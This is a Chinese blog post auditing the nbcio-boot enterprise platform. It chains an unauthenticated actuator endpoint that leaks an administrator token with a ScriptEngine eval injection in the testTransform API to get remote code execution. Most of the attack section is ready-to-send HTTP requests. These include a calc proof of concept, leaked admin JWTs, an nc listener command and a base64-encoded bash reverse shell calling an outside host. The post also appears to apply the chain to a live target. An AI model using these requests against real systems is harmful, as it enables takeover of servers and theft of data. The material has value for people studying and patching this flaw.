记一次代码审计之nbcio-boot从信息泄露到Getshell

已于 2024-09-04 20:51:04 修改
阅读量571 收藏 5
点赞数 5
文章标签: 网络 java 代码复审 web安全
于 2024-09-04 20:46:54 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/persist213/article/details/141903630
版权

《Java代码审计》icon-default.png?t=N7T8http://mp.weixin.qq.com/s?__biz=MzkwNjY1Mzc0Nw==&mid=2247484219&idx=1&sn=73564e316a4c9794019f15dd6b3ba9f6&chksm=c0e47a67f793f371e9f6a4fbc06e7929cb1480b7320fae34c32563307df3a28aca49d1a4addd&scene=21#wechat_redirect

一、项目简介

NBCIO 亿事达企业管理平台后端代码,基于jeecgboot3.0和flowable6.7.2,初步完成了集流程设计、流程管理、流程执行、任务办理、流程监控于一体的开源工作流开发平台,同时增加了聊天功能、大屏设计器、网盘功能和项目管理。
项目地址:https://gitee.com/nbacheng/nbcio-boot

二、环境搭建

只需修改配置文件中的mysql和redis连接信息即可正常运行。

图片

三、未授权分析

在ShiroConfig中放开了actuator方法的未授权访问
org/jeecg/config/shiro/ShiroConfig.java:156

图片


直接访问/actuator/httptrace可以免认证获取管理员的token信息

图片

四、RCE分析

此处代码调用了ScriptEngine的eval方法,此方法若不做特殊处理易引起代码注入问题,这里不做过多解释。
com/nbcio/modules/estar/bs/service/impl/DataSetParamServiceImpl.java:99

图片

图片


根据方法调用反向跟踪到了/testTransform接口

图片


由于该接口参数结构较为复杂,所以需要找到前端触发点直接抓包获取参数。

图片


点击测试预览即可触发该接口

图片


抓包修改参数并发出请求。

图片


成功触发计算器,本地测试OK

图片

POST /nbcio-boot/bs/bsDataSet/testTransform HTTP/1.1
Host: 192.168.64.1:8081
Content-Length: 345
Accept: application/json, text/plain, */*
X-TIMESTAMP: 20240808213818
X-Sign: ED5C3621799AA3EAC6D2ABAB498B1DCD
tenant-id: 0
X-Access-Token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE3MjMxMzU3MDAsInVzZXJuYW1lIjoiYWRtaW4ifQ.t5je51OW1Q40U-8d0HudQCXQc-WXQbP7o9cmvKjsO3Y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Content-Type: application/json;charset=UTF-8
Origin: http://218.75.87.38:9888
Referer: http://218.75.87.38:9888/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive

{"sourceCode":"mysql","dynSentence":"select * from bs_report_barstack","dataSetParamDtoList":[{"paramName":"","paramDesc":"","paramType":"","sampleItem":"","mandatory":true,"requiredFlag":1,"validationRules":"java.lang.Runtime.getRuntime().exec('calc');"}],"dataSetTransformDtoList":[{"transformType":"js","transformScript":""}],"setType":"sql"}

五、漏洞实战

1、按照第三步获取管理员认证信息

图片

GET /nbcio-boot/actuator/httptrace HTTP/1.1
Host: *****
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive

2、打开kali,nc监听指定端口

nc -lvnp 7777

图片

3、发送反弹shell的poc

图片

POST /nbcio-boot/bs/bsDataSet/testTransform HTTP/1.1
Host: ****
Content-Length: 450
Accept: application/json, text/plain, */*
tenant-id: 0
X-Access-Token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE3MjMyMjgyMTQsInVzZXJuYW1lIjoiYWRtaW4ifQ.oCbEjdP074ORip82D4ix27FtG0WgVnAlc7fjRZeZxgM
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Content-Type: application/json;charset=UTF-8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive

{"sourceCode":"mysql","dynSentence":"select * from bs_report_barstack","dataSetParamDtoList":[{"paramName":"","paramDesc":"","paramType":"","sampleItem":"","mandatory":true,"requiredFlag":1,"validationRules":"java.lang.Runtime.getRuntime().exec(\"bash -c {echo,YmFzaCAtaT4mIC9kZXYvdGNwLzZ2NzI4NzAyZjYuemljcC5mdW4vNTMyNjcgMD4mMQ==}|{base64,-d}|{bash,-i}\");"}],
"dataSetTransformDtoList":[{"transformType":"js","transformScript":""}],"setType":"sql"}

4、成功获取到目标shell

图片


至此,漏洞分析结束。

go_to_hacker
关注
  • 5
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
放假前升级一下nbcio-boot的一些组件到最新版本
宁波阿成的博客
02-06 458
放假前升级一下nbcio-boot的一些组件到最新版本
nbcio-boot基于jeecg的flowable支持部门经理的单个或多实例支持(前端部分)
宁波阿成的博客
04-30 566
nbcio-boot基于jeecg的flowable支持部门经理的单个或多实例支持(前端部分)
nbcio-boot项目的文件上传与回显处理方法
宁波阿成的博客
01-12 1048
nbcio-boot项目的文件上传与回显处理方法
基于jeecg-bootnbcio-boot亿事达企业管理平台发布
宁波阿成的博客
07-13 1231
基于jeecg-bootnbcio-boot亿事达企业管理平台发布
基于jeecg-bootNBCIO 亿事达企业管理平台
宁波阿成的博客
06-21 1946
NBCIO 亿事达企业管理平台,打造一个免费的企业综合管理平台,目前还是一个初步框架过程,初步搭建了流程的基本功能,以后希望增加OA、CRM和ERP等功能。
一次spring-boot程序内存泄露排查
liufang1991的专栏
01-09 7354
现象 spring boot项目jvm启动配置-Xms4g -Xmx4g,然而很不幸的是程序所占的内存越来越高,都达到了12个多G,只能临时重启服务 排查一:开发环境和测试环境调试 用jdk自带的jvisualvm.exe,查看最占空间的类和实例最多的类,找到其最近的内存释放点一般就是内存泄露对象,也可以用jstat查看jvm进程实例最多的类 本机启动程序,postman或者jmeter调用程序...
nbcio-boot的flowable流程流程模型查询时间长,el-table开始显示无数据的问题解决
宁波阿成的博客
12-21 574
nbcio-boot的flowable流程流程模型查询时间长,el-table开始显示无数据的问题解决
nbcio-boot移植到若依ruoyi-nbcio平台里一formdesigner部分(一)
宁波阿成的博客
09-10 432
nbcio-boot移植到若依ruoyi-nbcio平台里一formdesigner部分(一)
ruoyi-nbcio从spring2.7.18升级springboot到3.1.7,javajava8升级到17(一)
宁波阿成的博客
02-26 1009
ruoyi-nbcio从spring2.7.18升级springboot到3.1.7,javajava8升级到17(一)
一次使用dynamic-datasource-spring-boot-starter切换数据源失效的问题
chengpei147的博客
01-26 4340
文章目录项目场景:问题描述:原因分析:解决方案: 项目场景: 基于Thingsboard二次开发,将项目中数据库替换为mysql,基础数据放置于一个mysql库,时序数据放置于另一个mysql库,涉及到项目多数据源配置,使用了dynamic-datasource-spring-boot-starter进行多数据源配置,通过注解的方式配置不同模块使用不同数据源 问题描述: 由于thingsboard本身通过@SqlTsLatestAnyDao类似这些注解标注了哪些Dao操作是写时序数据,所以我在SqlTsL
autopoi V1.0.1 for nbcio-boot or jeecg-boot
08-01
autopoi V1.0.1 是一个专为nbcio-boot和jeecg-boot框架定制的自动化处理Excel数据的工具,其主要目的是提高开发人员在处理大量数据导入导出时的效率。该版本是基于jeecg的autoPOI 1.4.3进行优化升级的,特别强调了对...
nbcio-boot亿事达企业管理平台V1.0.0版本配套uni-app
07-14
"nbcio-boot亿事达企业管理平台V1.0.0版本"正是这样一个旨在帮助企业优化业务流程,提升办公效率的解决方案。该平台充分利用了前沿的前端技术栈,尤其是uni-app框架,结合vue.js的灵活性,以及flowable工作流引擎的...
nbcio-boot亿事达企业管理平台前端代码V1.0.1版本
07-31
《亿事达企业管理平台前端代码V1.0.1版本详解》 亿事达企业管理平台前端代码V1.0.1版本是一个针对企业管理和协作需求而设计的软件系统,其核心在于提供高效、便捷的业务操作界面。在这个版本中,开发团队对原有功能...
nbcio-boot亿事达企业管理平台后端代码V1.0.1版本
07-31
nbcio-boot亿事达企业管理平台后端代码V1.0.1版本】是针对企业信息化管理的一套软件解决方案,其核心在于提供高效、安全的后台支持。在这个V1.0.1版本中,开发团队对平台进行了多项重要更新和优化,以提升用户体验...
观测云核心技术解密:eBPF Tracing 实现原理
最新发布
观测云的博客
09-03 562
通过 eBPF,开发者可以在不修改内核源码的情况下,对内核功能进行扩展和监控。eBPF Tracing 利用这一技术,对系统调用、内核函数等进行跟踪,从而实现对应用行为的深入洞察。
计算机网络-VRRP工作原理
Linux基础知识、计算机网络基础学习分享。
09-03 309
初始化状态就是在设备上配置完成时的状态,Master状态为主设备的状态,Nackup状态为备份设备的状态,备份设备会监听主设备发送的Advertisement报文,当定时器超时都没有收到主设备的报文时则备份设备切换为Master状态。R1与R2交换VRRP报文,优先级一样,通过比较接口IP地址选举Master路由器,由于R2的接口IP地址大于R1的接口IP地址,因此R2被选举为Master路由器。进行比较,先比较优先级,优先级大的优先,优先级相等则比较接口IP地址,IP地址大的优先,
【CVPR‘24】BP-Net:用于深度补全的双边传播网络,新 SOTA!
梁瑛平的博客
08-28 753
深度补全任务旨在从稀疏的深度测量数据和同步的彩色图像中生成密集的深度图。现有的最先进方法多为基于传播的,通常作为对初始估计的密集深度的迭代改进。然而,这些初始深度估计通常直接将卷积层应用于稀疏深度图。在本文中,我们提出了一种双边传播网络(BP-Net),在最早阶段进行深度传播,以避免直接在稀疏数据上进行卷积。具体而言,我们的方法通过一个非线性模型从附近的深度测量中传播目标深度,该模型的系数由一个多层感知器生成,并基于辐射差异和空间距离进行调整。
网络编程学习:TCP/IP协议
kkbbaaii的博客
09-01 1450
网络编程学习:TCP/IP协议
动态代理和静态代理的区别,动态代理怎么提高网络安全
yls5yl的博客
08-28 1127
动态代理通过不断变化的IP地址,不仅在网络匿名性、隐私保护和抗攻击方面具有显著优势,还能有效提升用户的网络安全性。尽管与静态代理相比,动态代理可能在稳定性方面有所欠缺,但在现代复杂的网络环境中,它依然是保障网络安全的强大工具。了解并正确使用动态代理,将帮助用户在网络世界中游刃有余,最大程度地保护自己的隐私和数据安全
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值